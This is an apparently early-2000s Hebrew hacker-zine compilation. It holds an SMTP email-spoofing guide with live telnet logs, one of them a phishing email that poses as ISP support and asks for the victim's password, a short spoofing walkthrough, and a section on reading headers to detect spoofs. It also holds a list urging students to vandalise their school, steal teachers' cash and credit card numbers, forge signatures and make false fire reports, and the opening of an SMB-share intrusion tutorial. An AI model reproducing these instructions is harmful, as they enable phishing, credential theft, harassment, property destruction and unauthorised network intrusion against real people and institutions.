פה משהו חשוב: הפקודה HELO היא לא זאת שגורמת להזדהות. כלומר, אם לא תכתבו HELO זה לא אומר שאתם

אנונימיים והשרת לא יודע מי אתם. הפקודה רק מסמלת את ההזדהות והרבה פעמים ככה השרת גם יודע דרך איזה

תוכנה שלחו את האימייל או מאיזה דומיין. בכל מקרה, אני ממליץ שתשחקו עם זה בדיוק כמו עם כל פקודה

שאני אתן פה. אצל mail.hotmail.com לדוגמא, לא רק שתיאלצו לכתוב את הפקודה,

אלא גם תצטרכו להגיד מי אתם.

דוגמאות:

 

HELO Eduction.gov.il

HELO walla.co.il

HELO hacker

HELO FuckYou

HELO Ido

 

טוב. רק הערה אחרונה בקשר ל HELO, אם אתם תוהים למה זאת פקודת הזדהות אם בד"כ כותבים רק HELO בלי

להזדהות, אז ככה, ברגע שאתם כותבים:

 

HELO

 

השרת מגיב ב Lookup שבודק את כתובת המחשב שלכם. אבל שוב, זה לא אומר שאם לא תכתבו HELO שרת הדואר

לא יידע מי אתם....

טוב, אז אחרי ה HELO באה הפקודה הבאה: MAIL.

הפקודה MAIL אומרת לשרת שיתחיל עכשיו שליחת אימייל חדש, ויימחק (כמעט) את כל המידע שהיה לו עד עכשיו

על המכתב שעבר, כולל מי יקבל את המכתב,  את תוכן המכתב עצמו, את השולח וכו'. מקלידים את הפקודה

בצורה הבאה:

 

MAIL FROM: sender

 

כאשר ה sender = כתובת דואר שממנה מי שמקבל את האימייל יקבל את האימייל.

לדוגמא:

 

MAIL FROM: [email protected]

MAIL FROM: [email protected]

MAIL FROM: [email protected]

 

את הפקודה MAIL השרת מקבל רק פעם אחת. ברגע שהשרת קיבל את הפקודה, הוא יגיב עם הערה חיובית

שבאה יחד עם המספר 250. כמעט ואף פעם לא יקרה לכם שהשרת לא יחזיר תגובה של 250 אחרי פקודת ה MAIL.

זאת מכיוון שהשרת במקרה זה, מקשיב למה שאומרים לו. ואם תגידו לו שאתם [email protected] הוא

יקבל זאת. כמובן שזה לא נכון לכל שרתי הדואר, אבל אצל רובם זה כך. באמת. נסו את זה בעצמכם.

מקסימום הוא יגיד לכם שהדומיין sdf.sdf.bye.fuck לא קיים. אבל זה ייקרה לעיתים מאוד רחוקות..

במקרה וכתבתם

MAIL FROM: [email protected]

במקום

MAIL FROM: [email protected]

פשוט הקלידו מחדש את מה שרציתם,

ומכיוון שאחרי פקודת ה MAIL השרת מוחק את המידע שהיה לו על המכתב, הכתובת החדשה

והנכונה תתקבל, ולא זאת השגויה. רק הערה קטנה, הפקודה MAIL לא נועדה בכדי למחוק את המידע,

בשביל זה יש פקודה נוספת... אבל תרגישו חופשיים להשתמש בזה בהתחלה כדי לתקן את ה MAIL.

 

עכשיו, אחרי ה MAIL מגיע ה RPCT. ה RCPT אומר לשרת מי יהיה זה שיקבל את האימייל.

אם השרת מוצא שהכתובת אכן קיימת, הוא מגיב עם הערה חיובית שבאה יחד עם המספר... 250. אם הוא לא

מצליח למצוא את הכתובת, הוא מגיב בהערה שלילית יחד עם המספר 550. למי שעוד לא שם לב,

המספר 250 מסמל את התקבלות הפקודה. יש עוד מספרים שמסמלים עוד דברים. אבל נמשיך עם ה RCPT.

את ה RCPT כותבים כך:

 

RCPT TO: receiver

 

כאשר ה receiver = כתובת הדואר של הנמען. כלומר הבנאדם שיקבל את האימייל.

לדוגמא:

 

RCPT TO: [email protected]

RCPT TO: [email protected]

RCPT TO: [email protected]

RCPT TO: [email protected]

 

עכשיו, את הפקודה RCPT אפשר לכתוב ללא הגבלה כמה פעמים שאתם רוצים.

וכל זה במכתב יחיד!! לדוגמא הייתם רוצים לשלוח אימייל מזויף

לכל הלקוחות של בזק בינלאומי בפעם אחת, אתם מתחברים לשרת דואר שלהם ומקלידים משהו כזה:

 

HELO

MAIL FROM: [email protected]

RCPT TO: user1

RCPT TO: user2

RCPT TO: user3

RCPT TO: user4

RCPT TO: user5

RCPT TO: user6

 

וכן הלאה... כמובן ש user1 עד user6 הם סתאם שמות שהמצאתי והם לאו דווקא אמיתיים...

אז כמו שאתם רואים אפשר להקליד את הפקודה RCPT אלפי פעמים בכל אימייל. עם הפקודה MAIL לעומת זאת,

אי אפשר לעשות את זה. אלא תיאלצו לכתוב את כל האימייל מחדש בשביל זה. ועכשיו לפקודה הבאה שלנו,

שהיא ה DATA. פקודת ה DATA מתחילה את המכתב עצמו. כלומר בפקודה זו, אנו כותבים את המכתב.

אחרי שגמרנו, איך אומרים לשרת שגמרנו לכתוב את המכתב? פשוט מקלידים נקודה בשורה נפרדת.

לדוגמא:

 

DATA

Hi danny, What's up? I heard you just got

the latest album of 2pac. what shall i say? It sucks

I've heard it like a thousand times

anyway, enjoy it

bye

.

 

ה . (נקודה) בסוף מאוד חשובה. זה גם הכרחי שהיא תהיה בשורה נפרדת.

את המכתב אפשר כמובן גם לכתוב בעברית. עוד משהו חשוב, זה שהפקודה DATA כוללת גם את הראשים.

כלומר את התוספות של המכתב. כגון הנושא (או הכותרת אם אתם רוצים), את התאריך, כתובת/שם השולח

ולפעמים גם עוד כמה דברים. את הראשים (תוספות) כותבים כך:

 

Date: the date goes here

From: the sender

To: the receiver

Subject: subject goes here

        

לדוגמא:

 

DATA

Date: 23 Oct 00 11:29:33

From: [email protected]

To: [email protected]

Subject: Happy Birthday

 

Hi Yanir

I Wish you a Happy Birthday

Hope you'll enjoy being 15

I bought you this real awesome thing

You must see it

email me back as quick as ya can to [email protected]

c ya, matrix

.

 

כמו שאתם רואים, יש שורה ריקה המבדילה בין הראשים (תוספות) למכתב עצמו. השורה הזאת היא הכרחית.

עכשיו, את המידע של הראשים (שולח, נושא וכו') אפשר לכתוב גם בעברית.

כמו כן אם ב MAIL ציינתם את כתובת השולח, מה שבטוח עשיתם, אז בתוספת From אפשר לכתוב

שם או כינוי במקום כתובת אימייל. זה גם מאוד מומלץ לעשות את זה. עוד משהו,

זה שאת התוכן של ה Data עצמו אפשר גם לכתוב בעברית. עכשיו נסיים את זה עם כמה אימיילים מזויפים

ששלחתי. דרך אגב, הכל פה אמיתי. עשיתי לוגים מיוחד בשביל הטקסט הזה. זה הכל הוקלט חי מתוכנת הטלנט.

בסוף הדוגמאות, אני אראה לכם איך אתם יכולים גם להקליט את הזיופים שלכם, וכך תוכלו לעשות עם זה

מש שאתם רוצים... להראות לחברים, להדפיס, או לא יודע מה... בכל אופן, הנה הדוגמאות:

 

220 smtp.***.com ESMTP CPMTA-3_2_3_0 - NO UCE

Helo

250-smtp.***.com Hi.

250-PIPELINING

250-AUTH=LOGIN

250 8BITMIME

Mail from: ***@***.net.il

250 ok

Rcpt to: ***@***.com

250 ok

Data

354 go ahead

Date: 10 Nov 12:31

Subject: Error in I/O section

From: *** support team

To: ***@****.com

 

Hello from ***.com!

I'm sorry to inform you that there has been an error

in the I/O section of your account database, and this server's

password information has been temporarily destroyed. We need you,

the *** user, to hit reply and type your password in the subject.

      

        Thank you for your help,

                  The *** support team.

.

250 ok 973843116 qp 14873

quit

221 smtp.***.com closing connection

 

בכל מקום שאתם רואים '***' זה אומר שמחקתי את מה שהיה ושמתי *** במקום.

עשיתי את זה כדי לצנזר. החלטתי שעדיף שלא תדעו את שמות השרת, שולח ונמען.

בכל מקרה, כמו שאתם רואים, מה שעשיתי באימייל הזה זה שלחתי אימייל למשתמש של ספק מסויים,

כאשר הוא חושב שהוא קיבל את האימייל הזה מצוות התמיכה של אותו ספק. הוא מתבקש לשלוח את הסיסמא

שלו בכדי שיוכלו לתקן איזה בעיה בשרת. עכשיו, כשהוא מגיב עם הסיסמא, התוכנת דואר אומרת לו שזה

נשלח ל support team של אותו ספק, אבל מה שבאמת קורה זה שזה שולח את זה למישהו אחר. זה שולח את זה

לכתובת שכתבנו ב Mail from. אבל לצערי/שמחתי זה לא עובד ככה בכל שרת דואר. עכשיו לדוגמא הבאה:

 

220-*** (NO UCE) ESMTP server ready at Mon Feb 12 00:24:26 2001

220 ESMTP spoken here

helo

501 HELO requires domain address

helo ***.com

250 Requested mail action okay, completed

rcpt to: ***@***.com

503 Need MAIL before RCPT

mail from: webmaster@***.com

250 Requested mail action okay, completed

rcpt to: ***@***.com

550 invalid address

rcpt to: ***@***.com

550 Requested action not taken:user account inactive

rcpt to: ***@***.com

250 Requested mail action okay, completed

data

354 Start mail input; end with <CRLF>.<CRLF>

Date: 13 Nov 98 11:05

Subject: Fuck You

From: ***.com

To: ***@***.net

 

Hi there.

You better start shakin you fuckin asshole.

You damn jew hater. Fuck it OFF. I took you site down.

If you put it back up, I'll take it down again...

No Nazis aloud on the net!

Suck it you motherfucker.

 

.

250 Requested mail action okay, completed

quit

221 Service closing transmission channel

 

 

כמו שאתם רואים, באימייל הזה השרת לא הסכים לקבל את פקודת ה HELO שלי, וביקש שאכתוב גם דומיין.

רק אח"כ הוא נתן לי להמשיך. כמו כן, לפני ה MAIL כתבתי RPCT מה שגרם לשרת להגיד לי שלפני שאני

כותב RCPT עלי לכתוב MAIL ורק אחרי זה אוכל לכתוב RCPT. אח"כ, כשכתבתי את ה RCPT הבא, השרת העיר

לי שהכתובת אינה תקינה. ובניסיון השני הוא העיר לי שהשם משתמש לא קיים. רק בניסיון השלישי הוא הסכים.

כלומר, שרתי הדואר הם בד"כ מאוד ידודיתיים ויש להם יכולת תקשור נוחה יותר

מאשר לשרתים אחרים כגון POP או HTTP. טוב, עכשיו כמו שהבטחתי מקודם, אני אראה לכם איך גם אתם יכולים להקליט את הזיופים שלכם.

פיתחו את חלון ה Telnet. למי שלא זוכר, לוחצים על התחל, הפעלה, ואז מקלידים Telnet.

כעת לחצו על תפריט ה Terminal ובחרו ב Start Logging. אתם תתבקשו להקליד את שם הקובץ שעליו

ברצונכם להקליט את הזיוף. לדוגמא: c:\fake או c:\yonatan\hacking\test. מה שבא לכם...

אח"כ תתחברו לשרת הדואר ותעשו מה שאתם רוצים. (או כל שרת בעצם, לאו דווקא דואר...)

כשאתם גומרים ורוצים לסיים את ההקלטה, בחרו ב: Terminal, ואז Stop Logging.

עכשיו סגרו את חלון הטלנט, ופיתחו את הקובץ שעליו הקלטתם. לקובץ יהיה סיום של log.

לדוגמא:

 

test.log

cool.log

fuckit.log

 

וכו'.....

זהו. רק דבר אחרון לפני שאתם עוברים לחלק השלישי והאחרון,

הרבה שרתים תומכים בפקודה מאוד יעילה, והיא פקודת HELP.

נסו את זה בכמה שרתי דואר שונים. שחקו עם זה. זה יכול לעזור לכם מאוד לפעמים.

 

                                                              מקווה שהבנתם משהו,

                                                                           GeHeNoM       

 

 

זיוף Email - חלק 3

 

                      "...The Minute that It's Born it Begins to Die"

                (Marilyn Manson)

 

 

הגעתם לחלק האחרון של המדריך השלם לזיוף אימייל.

אתם לא ממש מוזמנים לפה, אף אחד לא ביקש ממכם לבוא, ואתם גם לא הכי רצויים, אבל אתם כאן.

אז אם אתם כבר כאן, בואו נתחיל. בחלק זה אני אראה לכם פקודות חדשות ושימושיות. ואת האמת,

גם ממש ממש מגניבות. חוץ מזה אתם גם תלמדו איך לבדוק אם האימייל שקיבלתם מזויף או לא, וגם איך

לאתר את הזייפן הבן זונה. טוב, נתחיל עם הפקודות המיוחדות החדשות. אני בטוח שתיהנו לשחק אייתם.

אני אראה לכם פה 3 פקודות מגניבות. שלושת הפקודות הם:

 

RSET

VRFY

NOOP

 

הראשון, RSET, תפקידו זה לעשות RESET למידע ששלחתם לשרת עד עכשיו.

כלומר למחוק הכל. לדוגמא, התחלתם זיוף אימייל, הגעתם כמעט לסוף, ופתאום החלטתם שיצא

חרא ואתם רוצים להתחיל מהתחלה, כל שעליכם לעשות הוא להקליד את הפקודה RSET וזהו.

עכשיו אתם יכולים להתחיל מחדש. הפקודה הבאה שלנו היא VRFY. מה שפקודת ה VRFY עושה זה בודקת

אם משתמש מסויים קיים במערכת.

לדוגמא אתם רוצים לדעת אם כתובת האימייל [email protected] באמת קיימת,

אתם מתחברים לשרת הדואר של אינטרנט זהב, ומקלידים:

 

VRFY slut

 

השרת יגיד לכם אם החשבון slut אכן קיים או לא. זה יכול להיות מאוד מאוד יעיל במקרים מסוימים,

אך בד"כ משתמשים בזה חברות מסחריות שרוצות לשלוח לכם מליון

פרסומות מעצבנות כי הם חושבים שהם ירוויחו מזה כסף ולא קולטים

שהם סתאם מעצבנים וגורמים לנו לשנוא אותם ואת המוצרים המחורבנים שלהם.

טוב, לפקודה הבאה והאחרונה. הפקודה NOOP היא פקודה שתפקידה לעשות.... כלום.

הפקודה NOOP לא עושה כלום. זה מה שמיוחד ומגניב בא. תנסו בעצמכם. מומלץ מאוד. הפקודה

קיימת בהרבה מאוד שרתי דואר. אז למה היא קיימת אם היא לא עושה כלום? כי את האמת היא כן עושה משהו...

רק לא משהו שממש נראה לעין. היא פשוט מאוד נקלטת לשרת, ובד"כ גם מחזירה פלט אל מסך המחשב שלכם האומר

שהפקודה נקלטה, התקבלה וכו'. כלומר, זה יכול להיות יעיל כדי לבדוק שהחיבור בסדר, או סתאם את מהירות

תגובת שרת הדואר וכל מיני שטויות כאלה...

 

 

גילוי אימייל מזויף ואיתור הבן זונה

עכשיו נגיד קיבלתם אימייל והוא נראה לכם חשוד. איך בודקים בוודאות?

מסתכלים בראשים (Headers) של המכתב. איך עושים את זה? זה קצת שונה עם כל תוכנה,

אבל תחפשו את האופציה באפשרויות (Settings) של תוכנת הדואר שלכם. כנ"ל גם לאלה שהאימייל שלהם

הוא web based email. כלומר שהאימייל שלהם הוא ב Newmail או Hotmail וכו'. עכשיו, אחרי ששיניתם

את ההגדרות של תוכנת הדואר שלכם להראות את ה Headers של כל אימייל, עיברו לקריאת האימייל שנראה לכם

חשוד, והתבוננו ב Headers. אם זו הפעם הראשונה שאתם עושים זאת, סביר להניח שזה ייראה לכם כמו סתאם

שטויות באנגלית. אבל זה בעצם אינפורמציה יעילה שיכולה לעזור לכם.

ובכן, בכל תוכנת דואר הראשים (Headers) ייראו קצת שונה, ולכן אני אתן פה כמה טיפים לגילוי זיוף

אימייל שיעבדו גם בתוכנות שבהם מאוד קשה לגלות אם זה מזויף או לא. ובכן, דבר ראשון, באימייל אמיתי,

יהיו בד"כ יותר הסברים והגדרות כי זה נשלח ע"י תוכנת דואר. לכן הראשים יהיו בד"כ ארוכים.

באימייל מזויף לעומת זאת, שנעשה בד"כ ידנית, לא יהיה הרבה פרטים בראשים, והם יהיה הרבה יותר קצרים.

עכשיו בואו תראו משהו אחר. נשווה פה בין 2 אימיילים מזויפים ששלחתי לעצמי. אחד ל altavista.com

ואחד ל hotmail.com.

בואו נראה קודם את האחד ב hotmail.com:

 

From [email protected] Sat Dec 09 16:34:21 2000

Received: from [212.179.186.110] by hotmail.com (3.2) ; Sat Dec 09 16:32:54 2000

Subject: Congradulations

Date: Sat Dec 09

 

 

כמו שאתם רואים השלוח טוען שהוא [email protected]

אבל כתוב שכתובת האיי פי שלו היא 212.179.186.110

אם נבדוק את האיי פי של hotmail.com נראה שזה בכלל 64.4.11.7

כלומר יש לנו פה שתי מחשבים מאוד שונים. כמו כן אם נבדוק את הכתובת של 212.179.186.110 אנחנו

נראה שזה בעצם bzq-186-110.bezeqint.net. כלומר משתמש של בזק בינלאומי. **בום** תפסנו אותו.

 

עכשיו באלטה ויזטה המצב מאוד דומה:

 

From:   [email protected] 

 

Date:   Sun 11 November

 

Subject:   Congradulations

Received: from unknown (HELO nba.com) (212.179.186.110)

by smtp.altavista.com (209.228.13.94) with SMTP; 9 Dec 2000 16:46:20 -0800

 

הפעם השולח טוען שהוא [email protected]

לכן נבדוק את האיי פי של nba.com ומתברר לנו שזה 204.202.128.223

מה שלא ממש דומה ל 212.179.186.110 אשר מתברר להיות אותו משתמש של בזק בינלאומי ממקודם.

כמו כן יש לנו כאן את כתובת השרת דואר שקיבל את המכתב. 209.228.13.94

אנחנו מקבלים את התאריך והשעה המדויקים של מתי נשלח המכתב. שחקו עם זה...

שוב, אני ממש ממש ממליץ לקרוא את RFC 821 לכל מי שיודע אנגלית

או שסתאם רוצה להעמיק את הידע באימייל. קריאת ה RFC תיתן לכם הרבה יותר הבנה של הנושא.

מקווה ש 3 העמודים הארוכים והמשעממים האלה על אימייל עזרו לכם במשהו,

 

 

                                                             GeHeNoM

 

 

 

מדריך זיוף Email מקוצר

  

  [::::: הערה - אל תגידו שאתם לא מבינים ותפסיקו לקרוא. תקראו עד הסוף ותבינו!!! :::::]

[:: למי שעוד לא הבין מה אני רוצה ממנו, תקראו עד הסוף סוף סוף. כי בהתחלה הכל לא מובן, ::]

[:: ואם קוראים עד הסוף אז הכל כן מובן. יפה. אז עכשיו תקראו מההתחלה עד הסוף. בלי להפסיק באמצע. ::]

        שוב, תקראו עד הסוף. גם אם אתם חושבים שלא מבינים כלום. תקראו עד הסוף. סוף. סוף. סוף.

 

אוקי, יא בני זונות עצלנים כוס אימא שלכם,

אז בגלל שלרובכם אין כוח לקרוא 3 עמודים מלאים על זיוף אימייל כתבתי פה מדריך מקוצר.

חסר לכם שאתם לא נהנים ממנו. תפיצו את המדריך הזה. תנו עותק לכל בנאדם שאתם מכירים. טוב, נתחיל.

 

הוראות: מתחברים לשרת הדואר, לפורט 25. שם כותבים את הפקודות הבאות:

 

 

HELO

Mail From: [email protected]

Rcpt To: [email protected]

Data

Subject: Fake Email

Date: Mon 23 October

 

This is a fake email

Have a nice day you bitch

.

quit

 

טוב. עכשיו כמה הסברים:

 

[email protected] = כתבו במקום את הכתובת שממנה אתם רוצים לשלוח את האימייל

 

[email protected] = כתבו במקום את הכתובת שתקבל את האימייל המזויף

 

Fake Email = כתבו כאן את הנושא של האימייל. או הכותרת אם אתם רוצים. (אותו דבר)

 

Mon 23 October = כתבו כאן את התאריך. אפשר גם להוסיף שעה כמובן.

אפשר גם לכתוב שזה נשלח לפני 1000 שנה או ההפך, בשנת 4072, איך שאתם רוצים. שחקו עם זה.

 

This is a fake email

Have a nice day you bitch = כתבו כאן את המכתב עצמו. אפשר גם בעברית.

 

ודרך אגב, גם את הנושא (או הכותרת לאלה מכם שרוצים) אפשר לכתוב בעברית.

רק הערה אחרונה, ואחרונה באמת: איך מתחברים לשרת הדואר לפורט 25??

ככה:

* לחצו על התחל

* לחצו על הפעלה...

* הקלידו: telnet server 25

 

server = כתובת של שרת דואר

לדוגמא, אם ניקח את הדוגמא מקודם סביר להניח שהשרת דואר היה mail.victim.com

ולכן הייתם מקלידים: telnet mail.victim.com 25

עוד אפשרויות לכתובת נפוצות:

smtp.victim.com

מה שכבר היה, mail.victim.com

ואחרון חביב victim.com

 

אז נגיד אתם מזייפים למישהו ב altavista.com אתם תקלידו: telnet mail.altavista.com 25

ואם לא עובד תנסו smtp.altavista.com ואם גם זה לא, אז פשוט altavista.com פשוט, פשוט, פשוט.

אם יש בעיות, תקראו את הכתבה המלאה של ה 3 עמודים. זהו. תיהנו. שלכם,

 

 

                                                              GeHeNoM

 

 

דברים כייפים לעשות בבית ספר - 2

 

לאור הפופלריות של החלק הראשון, צוות האתר החליט לכתוב עוד כתבה בנושא

'איך ליהנות במקום המחורבן הנקרא בית ספר'. אנחנו בטוחים שתיהנו, ומקווים שתבינו

מה באמת טוב בשבילכם ומי אתם באמת, ושלא תיתנו לבני זונות להשתלט לכם על המוח.

טוב, חאלס עם ההקדמה, הנה כל הרעיונות שקפצו לנו לראש:

 

* קחו דבק מגע, ומירחו אותו בנדיבות על כל המנעולים בבית הספר.

אח"כ תביטו איך המורים מנסים להכניס את המפתח למנעול. הם פשוט מנסים, ומנסים, ומנסים...

 

* אם יש לכם טלוויזיה בבית ספר, ציירו על המסך עם טיפקס.

 

* כשהמסדרונות מלאים, קחו כמה חברים, ותטענו שאתם מחפשים את העדשות מגע שלכם,

ושחשוב מאוד שאף אחד לא יזוז, כי מישהו יכול בטעות לדרוך על זה...

 

* מירחו שפתון, דבק, בוץ, או קקי על הידית של  הדלת של החדר מורים ושל חדר המנהל.

 

* כייסו מבית מרקחת תרופות נגד הקשת נחש. לכו ליד חדר המנהל, תבלעו כדור או שניים, ותיכנסו פנימה.

התרופה תגרום לכם להקיא. תשתדלו להקיא על הכיסא, השטיח, ספרים, וכל מה שנמצא שם.

 

* פרצו את תיבות הדואר של המורים שלכם. צלמו עותקים של כל דבר מעניין וחלקו לחברים. תרגישו חופשי

להשתמש בצ'קים, כסף מזומן שלפעמים תמצאו, והכי מגניב, אם יהיה לכם מזל, זה מספר כרטיס האשראי.

 

* השאירו פתקים ורמזים בכל מקום על כך ש "יום רביעי זה יום הצדק"

 

* ביום רביעי אל תעשו כלום.

 

* ביום חמישי אל תעשו כלום.

 

* ביום שישי אל תעשו כלום.

 

* בשבת לכו לבית ספר ותהרסו כל מה שאתם רואים. מומלץ להצטייד בפטיש, בנזין, מצית,

סכין, והרבה הרבה הרבה אבל באמת שהרבה מצב רוח טוב.

 

* השיגו כמה שיותר דברים חתומים עם חתימת המורה שלכם (הודעות, מבחנים, אישורים, וכו'),

ושבו עם הכל כמה שעות ותתחילו לנסות לתרגל את שיטת החתימה שלו.

כשתגיעו לרמת זיוף איכותית, תמצאו את החתימה שלו כמשהו שימושי מאוד.

 

* תהיו נחמדים למורים שלכם, והזמינו בשבילם פיצה לבית. עשו זאת בשמם ועל חשבונם כמובן.

אל תישכחו להזמין מנה משפחתית גדולה עם כל התוספות, ואני חושב שהם גם יירצו לשתות הרבה.

ואל תשכחו גלידה, כי אולי הם גם יירצו גם קצת גלידה אחר כך...

 

* אחרי שהם צעקו שעות על איש המשלוח, ונאלצו לשלם ולהיתקע עם הפיצה,

אני בטוח שהם ישמחו לקבל ביקור ממכבי האש שיבואו להציל אותם מ"שריפה במטבח"

או כל שריפה אחרת שתירצו לספר עליה למכבי האש דרך הטלפון...

 

* לכו לשירותים בבית הספר וסתמו את הנקז בכיור עם

פלסטלינה ותנו לכל המים להשתחרר מהברז. עשו זאת בסוף היום,

אחרי שכולם כבר הלכו הביתה. ביום למחרת כל הבית ספר יהיה מוצף מים....

 

* מורים רבים נוטים להשאיר את היומן שלהם במצבים ומקומות לא מוגנים. נצלו זאת בחוכמה.

 

* תתלשו את הסמלים מהמכוניות של המורים שלכם. כל סמל עולה בשוק כמאה, מאה חמישים שקל.

מכירו את הסמלים לאספנים או הוסיפו אותם לאוסף משלכם.

 

* תארגנו שביתה של כל השכבה והתנחלו במסדרון או ליד חדר המורים.

 

* הצטיידו במסמר או שניים ותעשו פנצ'רים בגלגלים של המכוניות של המורים שלכם.

כל יום תבחרו מכונית אחרת בצורה אקראית. זה הופך את הכיף לגדול יותר...

 

* תנו לכמה תרנגולים או סנאים להסתובב חופשי בבית הספר.

השתמשו בלפחות 5 תרנגולים/סנאים וזכרו כי כל המרבה הרי זה משובח.

 

* לכו לשירותים והכניסו כל מיני חפצים כמו כדור טניס, מכונית צעצוע, בובת פוקימן, בלון מנופח,

וכו' לתוך האסלה ולאחר מכן הורידו את המים. עשו זאת שוב ושוב ושוב עד שכבר אי אפשר להוריד את המים.

 

* הניחו שעונים מעוררים בכל מיני מקומות מוסתרים בבית הספר. אל תשכחו להפעיל אותם קודם.

 

* תארגנו שילד ישכב על הפנים לכיוון הרצפה. כשמורה ויתקרב לאזור

צירחו בהיסטריות משהו כמו "הוא קפץ!, הוא קפץ" והצביעו לכיוון חלון בקומה שלישית או משהו.

 

* התקשרו מהפלאפון לבית הספר ותעמידו פנים שאתם האבא של איזה ילד בבית הספר,

ושיישלחו אותו _עכשיו_ הביתה ושהוא צריך לחזור מהר כי סבתא נפטרה או כי יש מסיבה משפחתית לדוד מוטי

או כל דבר אחר שתחליטו להפליץ. תחשבו על סיבות משלכם. מקסימום אפשר להגיד שזה בגלל אירוע משפחתי

או שזה משהו אישי וכו'.

 

* פחחחחחחחחחחחחחחחחחחחחחחח.....

חשבתם שיש עוד???? צדקתם. נו, תעברו ל'*' הבאה.

 

* לכו לקומה שנייה או שלישית בבית הספר, כאשר כמה שיותר גבוה יותר טוב.

כעת שחקו את משחק היריקות ע"פ החוקים הבאים:

 

- פגיעה בילד/ילדה מורידה 3 נקודות

- פגיעה במורה מוסיפה 10 נקודות

- פגיעה בבעל חיים מוסיפה נקודה

- פגיעה בכל דבר אחר לא עושה כלום

הערות אחרונות:

מומלץ להתכופף אחרי כל יריקה כדי שלא ייראו אתכם.

המנצח הוא מי שמגיע ראשון ל 50 נקודות.

כל החוקים פתוחים לשינויים.

למי שלא הבין המשחק פועל בדרך הבאה: כל אחד יורק בתורו וצובר נקודות (או שלא). תיהנו.

 

* קחו כמה שקיות ניילון שקופות ומלאו אותם בקמח. כעת החביאו אותם בכל מיני מקומות שיפחידו

את מי שיימצא אותם. מקומות מומלצים הם באמצע איזה ספר, מתחת לספר, בתוך קלמר, בתוך תיק, בתוך ארנק

או כל מקום אחר של הילדים שהם המטרה שלכם. מומלץ שגם תשימו קצת מלח פה ושם למקרה שהם ינסו להסניף

את החומר ואז תשמעו הרבה אאאאאההההההה פצ'ווווווווו ו אאאאאייייייייייייייככככססס....

 

* ולסיום, משהו שכולם מכירים אבל קצת נשכח בשנתיים שלוש האחרונות.

קחו עת, או טוש (לורד), ופרקו את שני הקצוות שלו כך שיישאר לכם מעין קשית פלסטיק.

כעת גלגלו כדור קטן של פלסטלינה ושימו אותו בקצה אחד. עכשיו תנשפו חזק בקצה השני והפלסטלינה תעוף.

שחקו עם זה קצת עד שתלמדו להעיף ולכוון טוב. אם אין פלסטלינה תמיד אפשר להשתמש בנייר.

מומלץ להרטיב אותו לפני שיורים וככה הוא עף יותר טוב.

למי שלא מכיר, לכלי הנשק המפגר אך המהנה הזה קוראים טפו טפו.

 

זהו, כאן תם החלק השני של 'איך לכייף בבית הספר'.

תדפיסו את מה שקראתם עכשיו, תצלמו כמה עשרות עותקים,

תחלקו לחברים, ותיהנו.

                                   שלכם,

                                     GeHeNoM

 

 

אייקונים בביג טוק

 

בזמן האחרון, שמעתי מהרבה אנשים, הרבה תלונות, על כך שהם לא יכולים להשתמש בשירות

האייקונים של אורנג' מהסיבה הפשוטה שיש להם ביג טוק. ובכן, לכל הביג טוקים עם ה 5110

שלהם, שרוצים לשים אייקון בפלאפון וחשבו שהם לא יכולים, אז טעיתם. כי ממעמקי הצד האפל

של הגיהינום, אני בא אליכם, עם 100% רוע טהור, אני הוא גיהינום, שיראה לכם איך לרמות על הבני זונות.

 

ובכן, השיטה פשוטה וקלה ביותר, ואני מתקשה להבין איך אתם הקוראים החכמים שלי לא חשבתם על זה לבד.

אז ככה, טכנית, הדגם שלכם מסוגל להשתמש באייקונים. אבל מה, אורנג' משום מה החליטה

שמי שיש לו ביג טוק, לא יכול. למה? לא יודע.

 

אז איך דופקים אותם?

קחו פלאפון של מישהו אחר, מאותו דגם,

(אם לכם יש 6110, אז קחו 6110. אם יש לכם 5110, אז קחו 5110)

בעצם זה לא חייב להיות מאותו דגם, אבל סתאם שיהיה יותר מגניב קחו מאותו דגם,

ושבעל הפלאפון הזה לא יהיה רשום בשירות ביג טוק, ככה שאצלו שירות האייקונים לא יהיה חסום.

זה יכול להיות כל דבר חוץ מביג טוק. שיהיה אורנג' בי יו, אורנג' משפחה, זה לא משנה...

 

עכשיו החליפו אייתו את כרטיס ה sim.

איך מחליפים כרטיס sim?

קודם כל תכבו את המכשיר.

עכשיו תוציאו את הסוללה מהפלאפון, ושם תראו את מחזיק ה sim.

פיתחו אותו, ושילפו בעדינות את הכרטיס. כעת שימו אותו בצד,

ותכניסו בפנים את הכרטיס מהפלאפון השני.

החזירו את הסוללה למקום, והפעילו את הפלאפון.

 

עכשיו אורנג' לא תזהה שיש לכם ביג טוק, כי מבחינה טכנית כרגע אין לכם,

לכן שילחו לעצמכם איזה אייקון שבא לכם.

אחרי שהוספתם לכם אייקון פצצה, החליפו בחזרה את כרטיס ה sim, ונחשו מה? האייקון יישאר.

למה? כי הוא נשמר על המכשיר ולא על הכרטיס. מקווה מאוווד שתהנווו,

 

                                                           GeHeNoM

 

 

 

פריצה למחשבים

 

כן, זה נכון, אני עומד להסביר לכם צעד אחר צעד ובעברית,

איך מהמחשב האישי שלכם בבית, תוכלו לפרוץ למחשבים אחרים.

 

ובכן, סביר להניח שבבית הספר שלכם לדוגמא, ישנה רשת מחשבים מחורבנת

של המון מחשבים עם ווינדוס 95/98 שכולם מחוברים עם איזה חיבור

מהיר (פחות או יותר) דרך שרת NT וכי לכל המחשבים האלה ישנה רק מדפסת אחת

או שניים, אך כל המחשבים יכולים להדפיס במדפסת, ויש גם כמה ספריות, על מחשב

השרת, שלכל המחשבים יש גישה אליהם. זה לא כך בכל בית ספר או בכל משרד

או בכל מוסד חינוכי, או בכל רשת מחשבים עם ווינדוס, אבל זה כך במקרים רבים.

חדרתי להמון בתי ספר שרשת המחשבים שלהם הייתה בנויה בצורה כזו.

 

אז איך לעזאזל כל זה עובד?

מיקרוסופט השיקה יחד עם הווינדוס את האפשרות לשתף מדפסות או קבצים עם

מחשבים אחרים. המחשבים האחרים האלה יכולים להיות מחשבים ממרחק חצי מטר

שמחוברים למחשב שהפעיל את השיתופים עם כבל, וזה יכול להיות

המחשב שלכם בבית שנמצא בכלל במדינה אחרת, מדינת היהודים.

 

השיתופים מבוססים על פרוטוקל ה SMB שהוא פרוטקול הנותן למחשבים שונים לתקשר

ביניהם כמו כל פרוטוקול אינטרנט. לכן שימוש בשיתופים כאמצעי חדירה יכול גם

להיעשות ממחשב עם לינוקס (לינוקס תומכת ב SMB).

 

טוב, אז אתם בטח כבר מתים להתחיל, אבל איזה תוכנה אתם צריכים להוריד? כלום.

הכל בא יחד עם הווינדוס. במקרה שהווינדוס שלכם צרוב, ישנם סיכויים

שתיאלצו להשיג לכם עותק מקורי של דיסק ההתקנה של ווינדוס 95/98.

אבל כנראה תסתדרו גם בלי זה.

 

